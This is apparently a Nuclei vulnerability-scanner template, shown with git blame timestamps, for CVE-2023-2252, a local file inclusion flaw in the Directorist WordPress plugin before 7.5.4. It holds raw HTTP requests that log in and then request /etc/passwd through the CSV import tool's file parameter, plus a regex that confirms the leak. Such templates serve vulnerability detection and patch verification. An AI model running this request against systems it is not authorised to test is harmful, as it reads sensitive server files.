nuclei-templates/http/cves/2023/CVE-2023-2252.yaml

43 lines
1.2 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2023-2252
info:
name: Directorist < 7.5.4 - Local File Inclusion
author: r3Y3r53
severity: medium
description: |
Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.
reference:
- https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69
- https://wordpress.org/plugins/directorist/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2252
2023-07-15 16:29:17 +00:00
remediation: Fixed in version 7.5.4
2023-07-07 09:38:49 +00:00
metadata:
max-request: 2
verified: true
2023-07-15 16:29:17 +00:00
tags: wpscan,cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated
2023-07-07 09:38:49 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
2023-07-15 16:29:17 +00:00
2023-07-07 09:38:49 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200